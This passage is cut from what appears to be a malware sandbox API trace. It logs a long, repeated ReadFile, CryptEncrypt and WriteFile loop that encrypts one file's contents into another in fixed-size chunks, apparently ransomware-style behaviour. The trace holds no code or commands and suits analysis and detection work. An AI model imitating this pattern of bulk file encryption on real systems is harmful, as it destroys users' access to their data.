out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.132] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.132] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.132] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.133] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.133] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.133] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.133] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.133] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.133] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.134] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.134] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.134] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.134] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.134] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.134] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.135] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.135] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.135] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.135] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.136] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.136] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.136] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.137] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.138] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.138] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.138] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.138] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.139] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.139] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.139] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.139] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.139] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.139] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.139] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.139] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.140] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.140] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.140] ReadFile 